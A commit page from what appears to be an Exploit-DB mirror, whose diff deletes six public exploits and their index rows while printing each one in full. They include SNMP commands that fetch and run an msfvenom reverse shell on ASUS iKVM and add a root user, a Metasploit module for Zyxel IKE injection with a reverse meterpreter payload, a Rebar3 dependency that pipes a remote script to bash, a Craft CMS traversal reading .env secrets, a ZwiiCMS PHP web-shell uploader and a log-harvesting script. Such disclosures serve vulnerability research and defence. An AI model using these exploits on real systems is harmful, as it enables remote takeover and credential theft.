bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-07-03

Browse source 
13 changes to exploits/shellcodes/ghdb

ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access

Zyxel IKE Packet Decoder - Unauthenticated Remote Code Execution (Metasploit)

Rebar3 3.13.2 - Command Injection

Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)

ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated)

Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure
This commit is contained in:
Exploit-DB 2024-07-03 00:16:27 +00:00
parent ec14967376
commit 859e322e5c
7 changed files with 0 additions and 510 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

61
exploits/hardware/remote/52033.txt
View file

@ -1,61 +0,0 @@
# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access
# Date: 2023-02-16
# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023]
# Vendor Homepage: https://servers.asus.com/search?q=ASMB8
# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)
# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl
# CVE: CVE-2023-26602
++++++++++++++++++++
0x00 DESCRIPTION
++++++++++++++++++++
During a recent engagement, a remote server management interface has been
discovered. Furthermore, SNMPv2 was found to be enabled, offering write
access to the private community, subsequently allowing us to introduce
SNMP arbitrary extensions to achieve RCE.
We also found a hardcoded account sysadmin:superuser by cracking the
shadow file (md5crypt) found on the system and identifed an "anonymous"
user w/ the same password, however a lock seems to be in place to prevent
using these credentials via SSH (running defshell as default shell).
+++++++++++++++
0x01 IMPACT
+++++++++++++++
By exploiting SNMP arbitrary extension, we are able to run any command on
the system w/ root privileges, and we are able to introduce our own user
circumventing the defshell restriction for SSH.
+++++++++++++++++++++++++++++++
0x02 PROOF OF CONCEPT (PoC)
+++++++++++++++++++++++++++++++
At first, we have to create required extensions on the system, e.g. via
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"'
and if everything is set, we can just run that command by
snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
which will execute our defined command and show us its output.
+++++++++++++++++++++++++++++++
0x03 SSH Remote Root Access
+++++++++++++++++++++++++++++++
The identified RCE can be used to transfer a reverse tcp shell created
by msfvenom for arm little-endian, e.g.
msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin
We can now transfer the binary, adjust permissions and finally run it:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"'
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"'
Again, we have to request execution of the lines in the MIB via:
snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects
We get a reverse connection from the host, and can now act on the local system
to easily echo our own line into /etc/passwd:
echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd
By setting the standard shell to /bin/sh, we are able to get a SSH root
shell into the system, effectively circumventing the defshell restriction.
$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g
BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown
# uptime
15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25
# head -n 1 /etc/shadow
sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::
---
#EOF

152
exploits/hardware/remote/52049.rb
View file

@ -1,152 +0,0 @@
# Exploit Title: Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution
# Date: 2023-03-31
# Exploit Author: sf
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/
# Version: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive),
# VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive)
# Tested on: Linux
# CVE : CVE-2023-28771
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange
(IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are
as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive),
VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The
affected devices are vulnerable in a default configuration and command execution is with root privileges.
},
'License' => MSF_LICENSE,
'Author' => [
'sf', # MSF Exploit & Rapid7 Analysis
],
'References' => [
['CVE', '2023-28771'],
['URL', 'https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis'],
['URL', 'https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls']
],
'DisclosureDate' => '2023-03-31',
'Platform' => %w[unix linux],
'Arch' => [ARCH_CMD],
'Privileged' => true, # Code execution as 'root'
'DefaultOptions' => {
# We default to a meterpreter payload delivered via a fetch HTTP adapter.
# Another good payload choice is cmd/unix/reverse_bash.
'PAYLOAD' => 'cmd/linux/http/mips64/meterpreter_reverse_tcp',
'FETCH_WRITABLE_DIR' => '/tmp',
'FETCH_COMMAND' => 'CURL'
},
'Targets' => [ [ 'Default', {} ] ],
'DefaultTarget' => 0,
'Notes' => {
# The process /sbin/sshipsecpm may crash after we terminate a session, but it will restart.
'Stability' => [CRASH_SERVICE_RESTARTS],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(500)
]
)
end
def check
connect_udp
# Check for the Internet Key Exchange (IKE) service by sending an IKEv1 header with no payload. We can
# expect to receive an IKE reply containing a Notification payload with a PAYLOAD-MALFORMED message.
# In a default configuration, there appears no known method to identify the platform vendor or version
# number, so we cannot identify a CheckCode other than CheckCode::Detected or CheckCode::Unknown.
# If a VPN is configured on the target device, we may receive a Vendor ID corresponding to Zyxel, but we
# still would not be able to identify the version number of the target service.
ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI
ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI
ikev2_header << [0].pack('C') # Next Payload: None - 0
ikev2_header << [16].pack('C') # Version: 1.0 - 16 (0x10)
ikev2_header << [2].pack('C') # Exchange Type: Identity Protection - 2
ikev2_header << [0].pack('C') # Flags: None - 0
ikev2_header << [0].pack('N') # ID: 0
ikev2_header << [ikev2_header.length + 4].pack('N') # Length
udp_sock.put(ikev2_header)
ikev2_reply = udp_sock.get(udp_sock.def_read_timeout)
disconnect_udp
if !ikev2_reply.empty? && (ikev2_reply.length >= 40) &&
# Ensure the response 'Initiator SPI' field is the same as the original one sent.
(ikev2_reply[0, 8] == ikev2_header[0, 8]) &&
# Ensure the 'Next Payload' field is Notification (11)
(ikev2_reply[16, 1].unpack('C').first == 11 &&
# Ensure the 'Exchange Type' field is Informational (5)
(ikev2_reply[18, 1].unpack('C').first == 5)) &&
# Ensure the 'Notify Message Type' field is PAYLOAD-MALFORMED (16)
(ikev2_reply[38, 2].unpack('n').first == 16)
return CheckCode::Detected('IKE detected but device vendor and service version are unknown.')
end
CheckCode::Unknown
end
def exploit
execute_command(payload.encoded)
end
def execute_command(cmd)
connect_udp
cmd_injection = "\";bash -c \"#{cmd}\";echo -n \""
# This value is decoded by the packet decoder using a DES-CBC algorithm. The decoded value is written to the
# log file. As such the decoded value must not have any null terminator values as these will break our command
# payload. Therefore we use the below known good value that will decode to a suitable string, allowing the cmd
# injection payload to work as expected.
haxb48 = 'HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB'
ikev2_payload = [0].pack('C') # Next Payload: None - 0
ikev2_payload << [0].pack('C') # Reserved: 0
ikev2_payload << [8 + (haxb48.length + cmd_injection.length)].pack('n') # Length: 8 byte header + Notification Data
ikev2_payload << [1].pack('C') # Protocol ID: ISAKMP - 1
ikev2_payload << [0].pack('C') # SPI Size: None - 0
ikev2_payload << [14].pack('n') # Type: NO_PROPOSAL_CHOSEN - 14 (0x0E)
ikev2_payload << haxb48 + cmd_injection # Notification Data
ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI
ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI
ikev2_header << [41].pack('C') # Next Payload: Notify - 41 (0x29)
ikev2_header << [32].pack('C') # Version: 2.0 - 32 (0x20)
ikev2_header << [34].pack('C') # Exchange Type: IKE_SA_INIT - 34 (0x22)
ikev2_header << [8].pack('C') # Flags: Initiator - 8
ikev2_header << [0].pack('N') # ID: 0
ikev2_header << [ikev2_header.length + 4 + ikev2_payload.length].pack('N') # Length
packet = ikev2_header << ikev2_payload
udp_sock.put(packet)
disconnect_udp
end
end

41
exploits/multiple/webapps/52051.txt
View file

@ -1,41 +0,0 @@
# Exploit Title: Rebar3 3.13.2 Command Injection
# Date: 2020-06-03
# Exploit Author: Alexey Pronin
# Vendor Homepage: https://rebar3.org
# Software Link: https://github.com/erlang/rebar3
# Versions affected: 3.0.0-beta.3 - 3.13.2
# Tested on: Linux
# CVE: CVE-2020-13802
1. Description:
----------------------
Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.
2. Proof of Concept:
----------------------
* Add dependency with any of the following specification:
{
'dephelper', ".*", {
hg, "https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git",
"dephelper"}
}
or
{
'poc_rebar3', ".*", {
git, "https://github.com/vulnbe/poc-rebar3.git"
}
}
* Execute command: rebar3 clean
References
----------------------
* [Rebar3 vulnerability analysis](https://vuln.be/post/rebar3-command-injection/)
* [POC](https://github.com/vulnbe/poc-rebar3.git)
* [Vulnerability remediation PR](https://github.com/erlang/rebar3/pull/2302)
* [CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802)

111
exploits/php/webapps/52034.txt
View file

@ -1,111 +0,0 @@
# Exploit Title: Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)
# Date: 2022.01.26
# Exploit Author: Steffen Rogge
# Vendor Homepage: https://github.com/ethercreative/logs
# Software Link: https://plugins.craftcms.com/logs
# Version: <=3.0.3
# Tested on: Linux
# CVE : CVE-2022-23409
product: Ethercreative Logs plugin for Craft CMS
fixed version: >=3.0.4
impact: Medium
found: 2021-07-06
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"A quick and dirty way to access your logs from inside the CP"
As found on the plugin store page: https://plugins.craftcms.com/logs
Active Installs 4,093 (as of 2021-07-07)
Business recommendation:
------------------------
The vendor provides a patched version v3.0.4 which should be installed immediately.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Path Traversal (CVE-2022-23409)
The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside
the backend of the CMS. As the requested logfile is not properly validated, an attacker is
able to request arbitrary files from the underlying file system with the permissions of the
web service user.
Proof of concept:
-----------------
1) Authenticated Path Traversal (CVE-2022-23409)
As the plugin is installed as an administrator of the system and the function is only accessible
after being logged in as an admin, an attacker needs to be authenticated as an administrator in
the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.
The vulnerable endpoint is provided by the plugin under the following path:
https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream
The vulnerable controller for that endpoint can be found here:
https://github.com/ethercreative/logs/blob/master/src/Controller.php
The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input
values before file content is being read by the function "file_get_contents".
public function actionStream ()
{
$logsDir = \Craft::getAlias('@storage/logs');
$logFile = \Craft::$app->request->getParam('log');
$currentLog = \Craft::$app->request->get('log', $logFile);
$log = file_get_contents($logsDir . '/' . $currentLog);
exit($log);
}
A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem
with rights as the user executing the web server. In most cases this will be the user "www-data".
In order to read the file ".env" or ".env.php" which contains the environment configuration and as
such also the database credentials, the following request can be used:
GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;
The response then discloses the file content of the file ".env":
HTTP/1.1 200 OK
Date: Thu, 07 Jul 2021 10:08:52 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
Content-Length: 1600
Connection: close
[...]
$craftEnvVars = [
'DB_DRIVER' => 'mysql',
'DB_SERVER' => '********',
'DB_USER' => '********',
'DB_PASSWORD' => '********',
'DB_DATABASE' => '********',
'DB_SCHEMA' => 'public',
'DB_TABLE_PREFIX' => '',
'DB_PORT' => '********',
'SECURITY_KEY' => '********',
[...]
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available at the time
of the test:
* Version 3.0.3 released on November 25, 2019
Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs
Vendor contact timeline:
------------------------
2021-07-07: Contacting vendor through dev@ethercreative.co.uk
2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible
for any risks involved with plaintext communication
2021-07-08: Advisory was sent to vendor unencrypted
2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4
(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation
(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
2022-01-24: Release of security advisory
Solution:
---------
The vendor released a patched version 3.0.4 or higher which can be retrieved from their
website/github:
https://plugins.craftcms.com/logs
https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4
Workaround:
-----------
Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.

62
exploits/php/webapps/52050.txt
View file

@ -1,62 +0,0 @@
# Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution (Authenticated)
# Date: 03/06/2023
# Exploit Author: Hadi Mene
# Vendor Homepage: https://zwiicms.fr/
# Version: 12.2.04 and potentially lower versions
# Tested on: Linux
# CVE: CVE-2020-10567
# Category: webapps
ZwiiCMS 12.2.04 uses "Responible FileManager" 9.14.0 for its file manager feature. ZwiiCMS is vulnerable to CVE-2020-10567 as it is possible for
an authenticated user to use ajax_calls.php to upload a php file via a base64 encoded file and gain Remote Code Execution
due to a lack of extension check on the uploaded file.
Original CVE author : hackoclipse
https://github.com/trippo/ResponsiveFilemanager/issues/600
Vulnerable code (ajax_calls.php) :
// there is no extension check on $_POST['name'] and the content of $_POST['url'] can be b64 decoded without being
necessarily an image
81 case 'save_img':
82 $info = pathinfo($_POST['name']);
83 $image_data = $_POST['url'];
84
85 if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {
86 $image_data = substr($image_data, strpos($image_data, ',') + 1);
87 $type = strtolower($type[1]); // jpg, png, gif
88
89 $image_data = base64_decode($image_data);
PoC:
1) Login in the Administration Panel.
2) Click on the Folder icon on the top of the panel.
3) Open the Developer Tools for that page.
4) Copy,Edit and Execute the Javascript Code below .
5) Access your PHP shell at http://ZWIICMS_URL/site/file/source/shell.php?cmd=COMMAND
Javascript Code
######
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/192.168.0.27\/zwiicms\/core\/vendor\/filemanager\/ajax_calls.php?action=save_img", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "url=data:image/jpeg;base64,PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pg==&path=&name=shell.php";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
######

77
exploits/windows/remote/52032.py
View file

@ -1,77 +0,0 @@
# Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure
# Date: 09/08/2021
# Exploit Author: Rizal Muhammed @ub3rsick
# Vendor Homepage: https://www.wipro.com/holmes/
# Version: Wipro Holmes Orchestrator v20.4.1
# Tested on: Windows
# CVE : CVE-2021-38283
import requests as rq
import argparse
import datetime
import os
from calendar import monthrange
from multiprocessing.dummy import Pool as ThreadPool
from functools import partial
# Change if running on different port
port = 8001
log_list = [
"AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt",
"CustomerDomainCredentialService.txt", "CustomerFile.zip", "CustomerService.txt",
"DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt",
"ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt",
"ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt",
"MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt",
"ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt",
"SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt",
"TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt"
]
def check_month(val):
ival = int(val)
if ival > 0 and ival < 13:
return ival
else:
raise argparse.ArgumentTypeError("%s is not a valid month" % val)
def check_year(val):
iyear = int(val)
if iyear >= 1960 and iyear <= datetime.date.today().year:
return iyear
else:
raise argparse.ArgumentTypeError("%s is not a valid year" % val)
def do_request(target, date, log_file):
log_url = f"http://{target}/log/{date}/{log_file}"
log_name = f"{date}_{log_file}"
print(f"[*] Requesting Log: /log/{date}/{log_file}")
resp = rq.get(log_url)
if resp.status_code == 200 and not "Wipro Ltd." in resp.text:
print(f"[+] Success: {log_url}")
with open(f"logs/{log_name}", 'w') as lf:
lf.write(resp.text)
print(f"[*] Log File Written to ./logs/{log_name}")
def main():
parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure",
epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick")
parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True)
parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month)
parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year)
args = parser.parse_args()
ndays = monthrange(args.year, args.month)[1]
date_list = [f"{datetime.date(args.year, args.month, day)}" for day in range(1, ndays + 1)]
target = f"{args.target_ip}:{port}"
# Create folder "logs" to save log files, if it does not exist
if not os.path.exists("./logs"):
os.makedirs("./logs")
for log_date in date_list:
for log_file in log_list:
do_request(target, log_date, log_file)
if __name__ == "__main__":
main()

6
files_exploits.csv
View file

@ -3342,7 +3342,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,,
36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info
22898,exploits/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,remote,hardware,,2003-07-14,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8183/info
52033,exploits/hardware/remote/52033.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access",2024-06-01,ub3rsick,remote,hardware,,2024-06-01,2024-06-01,0,CVE-2023-26602,,,,,
44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Authentication Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999,2018-04-24,2018-05-02,1,CVE-2014-9583,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/37a844bef0e2fc648663d3bd15ee9101a5b4511c/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb
31033,exploits/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",remote,hardware,80,2014-01-20,2016-12-04,0,CVE-2013-6343;OSVDB-102267,,,,,
35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware,,2015-01-04,2015-01-08,1,OSVDB-116691;CVE-2014-9583,,,,,
@ -4030,7 +4029,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware,,2009-08-17,,1,OSVDB-57419,,,,,
17244,exploits/hardware/remote/17244.txt,"ZyWALL USG Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",remote,hardware,,2011-05-04,2011-05-04,1,,,,,,http://www.redteam-pentesting.de/advisories/rt-sa-2011-003
24760,exploits/hardware/remote/24760.txt,"ZYXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",remote,hardware,,2004-11-22,2013-03-13,1,CVE-2004-1540;OSVDB-12108,,,,,https://www.securityfocus.com/bid/11723/info
52049,exploits/hardware/remote/52049.rb,"Zyxel IKE Packet Decoder - Unauthenticated Remote Code Execution (Metasploit)",2024-06-14,ub3rsick,remote,hardware,,2024-06-14,2024-06-14,0,,,,,,
50870,exploits/hardware/remote/50870.txt,"Zyxel NWA-1100-NH - Command Injection",2022-04-19,"Ahmed Alroky",remote,hardware,,2022-04-19,2022-04-19,0,CVE-2021-4039,,,,,
30935,exploits/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,remote,hardware,,2007-12-25,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27024/info
43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",remote,hardware,,2017-11-01,2017-11-01,0,CVE-2016-10401,,,,,
@ -12209,7 +12207,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46585,exploits/multiple/webapps/46585.py,"Rails 5.2.1 - Arbitrary File Content Disclosure",2019-03-21,NotoriousRebel,webapps,multiple,,2019-03-21,2019-03-21,0,CVE-2019-5418,Traversal,,,,
46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple,,2019-05-06,2019-05-06,0,CVE-2018-20580,,,,,
48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,,2020-02-24,2020-02-24,0,,,,,,
52051,exploits/multiple/webapps/52051.txt,"Rebar3 3.13.2 - Command Injection",2024-06-14,ub3rsick,webapps,multiple,,2024-06-14,2024-06-14,0,,,,,,
10424,exploits/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,webapps,multiple,,2009-12-13,2015-07-12,0,,,,,,
46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
@ -16518,7 +16515,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-20418,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comCraft-3.0.25.rar,
46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80,2019-03-04,2019-03-04,0,CVE-2019-9554,"Cross-Site Scripting (XSS)",,,,
51918,exploits/php/webapps/51918.py,"Craft CMS 4.4.14 - Unauthenticated Remote Code Execution",2024-03-25,"Olivier Lasne",webapps,php,,2024-03-25,2024-03-25,0,,,,,,
52034,exploits/php/webapps/52034.txt,"Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)",2024-06-01,ub3rsick,webapps,php,,2024-06-01,2024-06-01,0,CVE-2022-23409,,,,,
48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,,2020-05-20,2020-05-20,0,,,,,,
1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,webapps,php,,2006-04-03,,1,OSVDB-24387;CVE-2006-1668;OSVDB-24386;CVE-2006-1667,,,,,
6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",webapps,php,,2008-08-24,2018-01-05,1,OSVDB-47782;CVE-2008-3845;OSVDB-47781;GTSA-00119,,,,,http://gulftech.org/advisories/Crafty%20Syntax%20Live%20Help%20SQL%20Injection/119
@ -34929,7 +34925,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46420,exploits/php/webapps/46420.txt,"Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting",2019-02-19,"Deyaa Muhammad",webapps,php,80,2019-02-19,2019-02-19,0,,"Cross-Site Scripting (XSS)",,,,
28842,exploits/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,webapps,php,,2006-10-23,2013-10-10,1,CVE-2006-5512;OSVDB-30007,,,,,https://www.securityfocus.com/bid/20682/info
15945,exploits/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",webapps,php,,2011-01-08,2011-01-08,0,OSVDB-70395;CVE-2011-0505,,,,http://www.exploit-db.comzwii_5147.zip,
52050,exploits/php/webapps/52050.txt,"ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated)",2024-06-14,ub3rsick,webapps,php,,2024-06-14,2024-06-14,0,,,,,,
24772,exploits/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",webapps,php,,2004-11-24,2013-03-14,1,CVE-2004-1075;OSVDB-12116,,,,,https://www.securityfocus.com/bid/11745/info
12454,exploits/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,webapps,php,,2010-04-28,,1,,,,,,
12262,exploits/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",webapps,php,,2010-04-15,,0,,,,,http://www.exploit-db.comZykeCMSV1.0.zip,
@ -45730,7 +45725,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3420,exploits/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,remote,windows,,2007-03-05,,1,OSVDB-30432;CVE-2006-3890,,,,,
